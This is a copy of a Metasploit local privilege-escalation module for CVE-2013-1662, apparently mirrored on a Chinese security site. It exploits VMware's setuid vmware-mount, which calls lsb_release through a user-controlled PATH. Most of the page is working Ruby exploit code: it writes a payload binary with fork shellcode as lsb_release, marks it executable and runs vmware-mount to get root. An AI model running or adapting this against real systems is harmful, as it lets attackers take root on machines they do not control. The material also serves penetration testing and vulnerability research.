首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VMWare Setuid vmware-mount Unsafe popen(3)
来源:metasploit.com 作者:egypt 发布时间:2013-08-29  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit4 < Msf::Exploit::Local

	include Msf::Exploit::EXE
	include Msf::Post::Common
	include Msf::Post::File

	def initialize(info={})
		super( update_info( info, {
				'Name'          => 'VMWare Setuid vmware-mount Unsafe popen(3)',
				'Description'   => %q{
					VMWare Workstation (up to and including 9.0.2 build-1031769)
					and Player have a setuid executable called vmware-mount that
					invokes lsb_release in the PATH with popen(3). Since PATH is
					user-controlled, and the default system shell on
					Debian-derived distributions does not drop privs, we can put
					an arbitrary payload in an executable called lsb_release and
					have vmware-mount happily execute it as root for us.
				},
				'License'       => MSF_LICENSE,
				'Author'        =>
					[
						'Tavis Ormandy', # Vulnerability discovery and PoC
						'egypt' # Metasploit module
					],
				'Platform'      => [ 'linux' ],
				'Arch'          => ARCH_X86,
				'Targets'       =>
					[
						[ 'Automatic', { } ],
					],
				'DefaultOptions' => {
					"PrependSetresuid" => true,
					"PrependSetresgid" => true,
				},
				'Privileged'     => true,
				'DefaultTarget' => 0,
				'References' => [
					[ 'CVE', '2013-1662' ],
					[ 'OSVDB', '96588' ],
					[ 'BID', '61966'],
					[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
					[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
				],
				'DisclosureDate' => "Aug 22 2013"
			}
			))
		# Handled by ghetto hardcoding below.
		deregister_options("PrependFork")
	end

	def check
		if setuid?("/usr/bin/vmware-mount")
			CheckCode::Vulnerable
		else
			CheckCode::Safe
		end
	end

	def exploit
		unless check == CheckCode::Vulnerable
			fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
		end

		# Ghetto PrependFork action which is apparently only implemented for
		# Meterpreter.
		# XXX Put this in a mixin somewhere
		# if(fork()) exit(0);
		# 6A02              push byte +0x2
		# 58                pop eax
		# CD80              int 0x80 ; fork
		# 85C0              test eax,eax
		# 7406              jz 0xf
		# 31C0              xor eax,eax
		# B001              mov al,0x1
		# CD80              int 0x80 ; exit
		exe = generate_payload_exe(
			:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
		)
		write_file("lsb_release", exe)

		cmd_exec("chmod +x lsb_release")
		cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
		# Delete it here instead of using FileDropper because the original
		# session can clean it up
		cmd_exec("rm -f lsb_release")
	end

	def setuid?(remote_file)
		!!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")
	end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·xml2 Fuzzer 1.0 exploit
·SPIP Connect Parameter PHP Inj
·WinAmp 5.63 (winamp.ini) - Loc
·Firefox XMLSerializer Use Afte
·Mac OS X Sudo Password Bypass
·HP LoadRunner lrFileIOService
·Belkin G Wireless Router Firmw
·Microsoft Hotmail or Outlook 0
·libtiff <= 3.9.5 - Integer Ove
·SPIP connect Parameter PHP Inj
·Schneider Electric PLC ETY Ser
·OSX <= 10.8.4 - Local Root Pri
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved